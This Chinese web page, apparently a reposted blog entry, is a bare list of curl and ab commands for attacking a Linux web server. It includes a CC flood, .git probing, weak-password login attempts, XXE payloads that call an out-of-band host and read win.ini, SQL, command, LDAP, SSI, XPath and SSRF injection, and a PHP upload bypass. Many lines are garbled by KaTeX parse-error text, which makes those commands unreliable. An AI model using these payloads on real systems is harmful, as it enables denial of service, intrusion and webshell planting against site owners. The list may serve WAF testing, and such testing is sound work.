web攻击(Linux服务器)
CC攻击
1、安装ab命令:yum -y install httpd-tools
2、发起CC攻击:ab -c 200 -n 100000 -H “host:域名” http://IP/1.html
(表示200个并发数,共100000条数据)
web攻击
敏感信息探测:
curl -H “host:域名” http://IP/.git/
文件读取:
curl -H “host:域名” http://IP/soldierofallah.php
威胁情报:
curl -H “host:域名” http://IP/plus/mytag_js.php?aid=511348
平台漏洞:
curl -H “host:域名” http://IP/lesson/tt.t:123xt/1.php
代码执行:
curl -H “host:域名” http://IP/a.php?time=lang.ProcessBuilder
弱密码:
json格式:
curl -vvv -X POST -H “Content-Type:application/json” -H “host:域名” http://IP/" -d ‘{“account”:“12345”,“pwd”:“12345”}’
urlencoded方式:
curl -vvv -X POST -H “Content-Type:application/x-www-form-urlencoded” -H “host:域名” http://IP/" -d “account=admin&password=12345”
解码url_encode:
curl -XPOST -H “host:域名” “http://ipport/wls-wsat/notify” -d ‘%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%3C!DOCTYPE%20root%20%5B%3C!ENTITY%20%25%20xxe%20SYSTEM%20%22http%3A%2F%2Fxxxxx.8ug564.ceye.io%2F%22%3E%25xxe%3B%5D%3E’
XML检测:
curl -XPOST -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/xxe1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%20%0A%3C%21DOCTYPE%20xxe%20%5B%0A%3C%21ELEMENT%20name%20ANY%20%3E%0A%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fC%3A%2fwindows%2fwin.ini%22%20%3E%5D%3E%0A%3Croot%3E%0A%3Cname%3E%26xxe%3B%3C%2fname%3E%0A%3C%2froot%3E”
html转义:
curl -XPOST -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/wls-wsat/notify” -d ‘<?xml version=“1.0” encoding=“utf-8”?><!DOCTYPE root [<!ENTITY % xxe SYSTEM “http://xxxxx.8ug564.ceye.io/”>%xxe;]>’
base64编码:
curl -XPOST -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/wls-wsat/notify” -d ‘Jmx0Oz94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPyZndDsmbHQ7IURPQ1RZUEUgcm9vdCBbJmx0OyFFTlRJVFkgJSB4eGUgU1lTVEVNICJodHRwOi8veHh4eHguOHVnNTY0LmNleWUuaW8vIiZndDsleHhlO10mZ3Q7’
SQL注入:
curl -XPOST -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/index.php?id=1 and 1=1”
命令注入:
curl -XPOST -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/index.php?arg=;fputs(fopen(“shell.php”,“w+”)”
LDAP注入:
curl -i -s -k -X GET -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/ldap.php?name=%29%28objectClass%3D%29%29%28%26%28objectClass%3Dvoid&info=z&form=submit”
SSI注入:
curl -i -s -k -X POST -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ -H \"Content-T…ipport/ssi.php”
文件注入:
curl -XPOST -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/upload” -d ‘------WebKitFormBoundaryKCgWwSJpeiff03B6Content-Disposition: form-data; name=“file”; filename="aaa.php.aaxxx"Content-Type: image/png<?phpphpinfo();?>------WebKitFormBoundaryKCgWwSJpeiff03B6–’
XPATH注入:
curl -g -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/xpath.php?[(genre=%27)]child::node()[@*]|id[contains(%27%27,%20%27&action=search)]”
SSRF注入:
curl -i -s -k -X ‘GET’ -H “Host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/index.php?id=http://foo.bar.10.0.0.1.xip.io” -H ‘Connection: close’ -H ‘Content-Length: 2’ --data-binary ‘\x0d\x0a’
XML攻击防护:
curl -H “host:KaTeX parse error: Can't use function '\"' in math mode at position 5: host\̲"̲ \"http://ipport/test/dtd.xml?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%20%0A%3C%21DOCTYPE%20xml%20%5B%0A%3C%21ELEMENT%20name%20ANY%20%3E%0A%3C%21ENTITY%20xml%20SYSTEM%20%22file%3A%2f%2f%2fC%3A%2fwindows%2fwin.ini%22%20%3E%5D%3E%0A%3Croot%3E%0A%3Cname%3E%26xml%3B%3C%2fname%3E%0A%3C%2froot%3E”
web攻击(Linux服务器)相关推荐
- CentOS防止黑客攻击Linux服务器实战演练
1.黑客攻击Linux服务器有哪些手段?攻击具体的点? 1)黑客可以通过域名劫持.WEB网站SQL注入: 2)可以通过WEB程序.JAVA网站漏洞, 心血漏洞: 3)黑客基于DDOS攻击网站服务器.攻 ...
- Fairware勒索软件频繁攻击Linux服务器 大家赶紧做好备份
近期,Linux服务器管理员们报告了多次攻击,这些攻击导致服务器的web文件夹消失.网站无限期关闭.在BleepingComputer网站的论坛上,众多帖子证实了大量这样的攻击. 据一个受害者说,此类 ...
- 解决Java Web对Linux服务器不能上传文件的难题
一 Java Web文件上传程序 页面中用html或某个js框架,弹出选择上传文件界面,用户选择文件后上传:传到服务器上调用servlet进行处理,把接受到的内容写入服务器相应目录.Java Web上 ...
- 2021-06-05攻击Linux服务器的四种级别
3. 概述 随着Linux企业应用的扩展,有大量的用户使用Linux操作系统.Linux系统的安全性能受到越来越多的关注,本章根据Linux系统受到攻击的程度通过级别形式列出,并提出不同的解决方案. ...
- CentOS Linux服务器实现攻防演练
转载来源 :京峰教育,如果侵权,及时联系我删除. 企业Linux服务器安全攻防实战演练 1)剖析黑客攻击服务器.网站哪些方法和手段: 2)基于两台CentOS Linux服务器实现攻防演练: 3)基于 ...
- 11 款扫描 Linux 服务器安全漏洞和恶意软件的工具
原文地址 尽管基于 Linux 的系统通常被认为是不可渗透的,但仍然存在需要认真对待的风险. Rootkit.病毒.勒索软件和许多其他有害程序通常会攻击 Linux 服务器并导致问题. 不管是什么操作 ...
- 无法检测的新型 Linux 恶意软件利用 Dogecoin API 攻击 Docker 服务器
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 虽然Linux 恶意软件曾位于恶意软件生态系统的边缘位置,但如今每周都会发现新型 Linux 威胁. Intezer 实验室发布报告称 ...
- linux洪水攻击软件,Linux服务器下对SYN洪水攻击的诊断和阻挡
1.简介SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,常用假冒的IP或IP号段发来海量的请 ...
- 空服务器安装linux,debian服务器linux服务器web建站搭建linux服务器之Debian安装
debian服务器linux服务器web建站搭建linux服务器之Debian安装 原文来自i火吧 大家都知道linux的发行版本很多,有centos啊,debian啊,ubuntu等,下面我就用de ...
最新文章
- 1.8 Arrays工具类
- ASP.NET页面的处理过程完全版_AX
- 特征计算 - Jaccard 相似系数与 Python 代码实现
- LeetCode之两数之和
- word中怎样单独删除某一页的页码
- python复制代码会被发现吗,我发现了一个记忆代码片段,我想知道它在复制。复制...
- VC2008 ATL控件 去掉运行库依赖
- SaCa DataViz 企业版 | 高性能大数据分析引擎
- oracle u4e00 u9fa5,Oracle 判断汉字 [\u4e00-\u9fa5]
- 设置Linux用户无口令登陆方式
- 通过Backtrack Linux 来加强你的安全防御
- 无极灯与LED灯将在短期内合力淘汰传统光源
- 通达信资金净流入公式_资金净流入(通达信)公式
- 织梦dedecms包装设计生产公司网站模板(中英文版)
- 记忆的分类及其理论模型
- 什么是实验室人员比对人员_实验室人员比对分析方法的讨论
- Vmware安装MacOS提示请选择您要安装的macOS的磁盘
- 99% 的程序员想不到的一个技巧,绝对让领导眼前一亮,好感倍增!
- image失败 安装scikit_安装scikit-image问题
- 《青春》英语美文欣赏(中英对照)